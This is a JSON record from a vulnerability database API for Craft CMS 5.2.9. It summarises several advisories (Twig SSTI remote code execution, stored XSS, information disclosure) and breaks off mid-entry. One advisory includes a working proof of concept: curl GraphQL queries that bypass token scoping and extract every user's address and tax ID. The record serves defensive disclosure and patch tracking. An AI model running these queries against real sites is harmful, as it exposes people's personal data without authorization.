{"url":"http://public2.vulnerablecode.io/api/packages/780922?format=json","purl":"pkg:composer/craftcms/cms@5.2.9","type":"composer","namespace":"craftcms","name":"cms","version":"5.2.9","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"5.9.18","latest_non_vulnerable_version":"5.9.18","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49573?format=json","vulnerability_id":"VCID-1468-4fdx-kbfr","summary":"Craft CMS vulnerable to potential authenticated Remote Code Execution via Twig SSTI\nFor this to work, users must have administrator access to the Craft Control Panel, and [allowAdminChanges](https://craftcms.com/docs/5.x/reference/config/general.html#allowadminchanges) must be enabled for this to work, which is against Craft CMS' recommendations for any non-dev environment.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nAlternatively, a non-administrator account with allowAdminChanges disabled can be used, provided access to the System Messages utility is available.\n\nIt is possible to craft a malicious payload using the Twig `map` filter in text fields that accept Twig input under Settings in the Craft control panel or using the System Messages utility, which could lead to a RCE.\n\nUsers should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.\n\nReferences:\n\nhttps://github.com/craftcms/cms/commit/d82680f4a05f9576883bb83c3f6243d33ca73ebe\n\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68454","reference_id":"","reference_type":"","scores":[{"value":"0.00499","scoring_system":"epss","scoring_elements":"0.66303","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68454"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","reference_id":"","reference_type":"","scores":[{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-06T14:26:38Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"},{"reference_url":"https://github.com/craftcms/cms/commit/d82680f4a05f9576883bb83c3f6243d33ca73ebe","reference_id":"","reference_type":"","scores":[{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-06T14:26:38Z/"}],"url":"https://github.com/craftcms/cms/commit/d82680f4a05f9576883bb83c3f6243d33ca73ebe"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68454","reference_id":"CVE-2025-68454","reference_type":"","scores":[{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68454"},{"reference_url":"https://github.com/advisories/GHSA-742x-x762-7383","reference_id":"GHSA-742x-x762-7383","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-742x-x762-7383"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-742x-x762-7383","reference_id":"GHSA-742x-x762-7383","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-06T14:26:38Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-742x-x762-7383"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68454","GHSA-742x-x762-7383"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1468-4fdx-kbfr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49572?format=json","vulnerability_id":"VCID-1mb5-28xp-ckd2","summary":"Craft CMS vulnerable to potential information disclosure via unchecked asset relocation\nAuthenticated users on a Craft installation could potentially expose sensitive assets via their user profile photo via maliciously crafted requests.\n\nUsers should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.\n\n Resources:\n\nhttps://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9\n\nhttps://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68436","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.1173","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68436"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T15:35:10Z/"}],"url":"https://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68436","reference_id":"CVE-2025-68436","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68436"},{"reference_url":"https://github.com/advisories/GHSA-53vf-c43h-j2x9","reference_id":"GHSA-53vf-c43h-j2x9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-53vf-c43h-j2x9"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-53vf-c43h-j2x9","reference_id":"GHSA-53vf-c43h-j2x9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T15:35:10Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-53vf-c43h-j2x9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68436","GHSA-53vf-c43h-j2x9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1mb5-28xp-ckd2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50301?format=json","vulnerability_id":"VCID-39ct-cg7w-kyb6","summary":"Craft CMS has Stored XSS in Table Field via \"HTML\" Column Type\nA stored Cross-site Scripting (XSS) vulnerability exists in the `editableTable.twig` component when using the `html` column type. The application fails to sanitize the input, allowing an attacker to execute arbitrary JavaScript when another user views a page with the malicious table field.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27126","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01772","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27126"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-24T19:33:58Z/"}],"url":"https://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27126","reference_id":"CVE-2026-27126","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27126"},{"reference_url":"https://github.com/advisories/GHSA-3jh3-prx3-w6wc","reference_id":"GHSA-3jh3-prx3-w6wc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3jh3-prx3-w6wc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-3jh3-prx3-w6wc","reference_id":"GHSA-3jh3-prx3-w6wc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-24T19:33:58Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-3jh3-prx3-w6wc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["CVE-2026-27126","GHSA-3jh3-prx3-w6wc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-39ct-cg7w-kyb6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95319?format=json","vulnerability_id":"VCID-41uv-1axm-fugb","summary":"Craft CMS's Missing Authorization in GraphQL Address Resolver Allows Cross-Scope PII Disclosure\n### Summary\n\nThe GraphQL Address element resolver (src/gql/resolvers/elements/Address.php) performs no schema scope filtering on top-level queries. A GraphQL API token scoped to a single low-privilege user group can read every address in the system, including addresses belonging to users in groups the token has no authorization to access. This exposes PII, including full names, addresses, organizations, tax IDs, etc.\n\n### Details\n\nEvery GraphQL element resolver in Craft CMS applies schema scope filtering via `GqlHelper::extractAllowedEntitiesFromSchema()` when handling top-level queries, except the Address resolver.\n\nThe only gate check for addresses is `canQueryUsers()` (`src/gql/queries/Address.php`, line 30), which is a binary check. It returns `true` if the token has access to *any* user group. Once past this gate, no further filtering is applied.\n\n### PoC\n\n**Tested on:** CraftCMS 5.9.17 (fresh Docker install, PHP 8.3)\n**Prerequisites:** A GraphQL API token with read access to any single user group\n\n### Environment\n\n- Two user groups: `publicUsers` (in token scope) and `internalTeam` (NOT in scope)\n- 5 internal executives with corporate addresses (internalTeam)\n- 3 public customers with personal addresses (publicUsers)\n- GQL token scoped to `publicUsers:read` only\n\n**Step 1:** Introspect the schema to discover the `addresses` query is available to this token. Issue the below curl command \n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ __type(name: \\\"Query\\\") { fields { name description } } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1641\" height=\"856\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d798b4d2-9965-40fd-8252-ba6b08d1dde9\" />\n\nThe token can see `addresses`, `entries`, `users` as top-level queries.\n\n**Step 2:** Enumerate Address fields to identify PII exposure surface.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ __type(name: \\\"AddressInterface\\\") { fields { name\ntype { name } } } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1726\" height=\"862\" alt=\"image\" src=\"https://github.com/user-attachments/assets/31a90b5d-7337-49b9-8802-355f16b7b4f3\" />\n\n> Exposed fields include: `fullName`, `firstName`, `lastName`, `addressLine1/2/3`, `locality`, `postalCode`, `countryCode`, `organization`, `organizationTaxId`, `latitude`, `longitude`.\n> \n\n**Step 3:** Establish baseline -  confirm the token’s user scope is limited. This proves our token only has access to the `publicUsers` group.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ addresses { id fullName firstName lastName addressLine1 addressLine2 locality postalCode countryCode organization\norganizationTaxId } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1626\" height=\"492\" alt=\"image\" src=\"https://github.com/user-attachments/assets/42ec8c3d-d1ae-4eac-9202-af072f394e4a\" />\n\nOnly 5 public users returned. Scope enforcement works correctly for the User resolver — internal executives are NOT visible.\n\n**Step 4:** Query all addresses - the token returns data for ALL user groups, including those outside its authorized scope.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ addresses { id fullName firstName lastName addressLine1 addressLine2 locality postalCode countryCode organization\n  organizationTaxId } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1902\" height=\"910\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ef34e11c-36a8-4582-93e3-04c3e4dad6ab\" />\n\n<img width=\"1444\" height=\"942\" alt=\"image\" src=\"https://github.com/user-attachments/assets/64d6edec-60bf-4481-8a20-7f64c81c015b\" />\n\n\n ▎ \"This token can only see 5 users, but it returns 10 addresses\" as shown in the above 2 screenshot outputs\n\n> **All 10 addresses returned.** The same token that only sees 5 public users now returns addresses for internal executives including corporate tax IDs:\n> \n> - Sarah Chen, 4200 Executive Plaza Dr, SF — Horizon Dynamics Inc. (TaxID: 82-4917263)\n> - James Whitfield, 89 Kensington High St, London — Whitfield Capital Partners LLP (TaxID: GB927461038)\n> - Maria Rossi, 15 Via della Conciliazione, Roma — Rossi & Bianchi Avvocati (TaxID: IT04829173651)\n> - David Nakamura, 2-11-3 Meguro, Tokyo — Nakamura Medical Technologies KK (TaxID: JP8230-4719-2835)\n> - Elena Voronova, 27 Universitätsstrasse, Zurich — Voronova Biotech AG (TaxID: CHE-384.291.057)\n\n---\n\n**Step 5:** Targeted IDOR - extract a specific internal user’s address by owner ID.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ addresses(ownerId: [3]) { fullName addressLine1 addressLine2 locality postalCode countryCode organization\n  organizationTaxId } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1902\" height=\"365\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b7c6d5cf-295a-433a-a76c-2b69815968cd\" />\n\n> Directly extracts a specific internal team member’s address: “Secret Admin”, 1 Secret Government Facility, Suite 007, Langley 22101 — SecretCorp LLC (TaxID: 98-7654321). The token has zero authorization to access this user’s data.\n\n## Impact \n\n### Who is Impacted\n\nAny Craft CMS Pro site (v4.0.0+) that uses GraphQL API tokens with user group scoping and stores user addresses. This is the standard deployment pattern for headless CMS sites using frameworks such as Next.js, Nuxt.js, or Gatsby. An attacker with any valid GraphQL token that has access to at least one user group can extract all addresses in the system, regardless of scope restrictions.\n\n### Risk\n\n- Direct threat to installation data: Any GraphQL API token with access to any single user group can extract all address systems-wide, including names, home addresses, organizations, and tax IDs belonging to users in restricted groups.\n\n- Targeted extraction via IDOR: The `ownerId` argument allows an attacker to extract specific users’ addresses by ID, enabling targeted reconnaissance against administrators or high-value users without any brute-force or elevated access.\n\n- Scope boundary failure: Craft CMS’s GraphQL schema scoping system is the primary security mechanism for controlling API access. Every other element resolver (Entry, User, Asset, Category, Tag) enforces this boundary. The Address resolver does not, making this a foundational gap in Craft’s native authorization model and not a site-specific configuration issue.\n\n- Affects all installations using GraphQL with user groups: Any Craft CMS Pro site that exposes a scoped GraphQL token and stores addresses is affected. This is the standard headless CMS deployment pattern, not an edge case.\n\n## AI Disclosure\n\nThis vulnerability was identified through manual source code review with AI-assisted analysis (Claude). The initial pattern deviation (Address resolver missing scope filtering while all other resolvers have it) was identified through manual comparison of resolver implementations. AI was used to assist with code navigation, PoC scripting, and report drafting. \n\nAll findings were verified against a local Docker instance of Craft CMS 5.9.17.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/834b2cf61ad0dcee9b03add44ed402ebf18db128","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44010","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02886","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44010"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/834b2cf61ad0dcee9b03add44ed402ebf18db128","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:22:09Z/"}],"url":"https://github.com/craftcms/cms/commit/834b2cf61ad0dcee9b03add44ed402ebf18db128"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-gj2p-p9m4-c8gw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:22:09Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-gj2p-p9m4-c8gw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44010","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44010"},{"reference_url":"https://github.com/advisories/GHSA-gj2p-p9m4-c8gw","reference_id":"GHSA-gj2p-p9m4-c8gw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-gj2p-p9m4-c8gw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/118776?format=json","purl":"pkg:composer/craftcms/cms@5.9.18","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.18"}],"aliases":["CVE-2026-44010","GHSA-gj2p-p9m4-c8gw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-41uv-1axm-fugb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50876?format=json","vulnerability_id":"VCID-4wkr-jx1w-77hn","summary":"CraftCMS has an RCE vulnerability via relational conditionals in the control panel\nA Remote Code Execution vulnerability exists in the Craft CMS 5 conditions system.\n\nThe `BaseElementSelectConditionRule::getElementIds()` method passes user-controlled string input\nthrough `renderObjectTemplate()` -- an unsandboxed Twig rendering function with escaping disabled.\n\nAny authenticated Control Panel user (including non-admin roles such as Author or Editor) can achieve full\nRCE by sending a crafted condition rule via standard element listing endpoints.\n\nThis vulnerability requires no admin privileges, no special permissions beyond basic control panel access, and\nbypasses 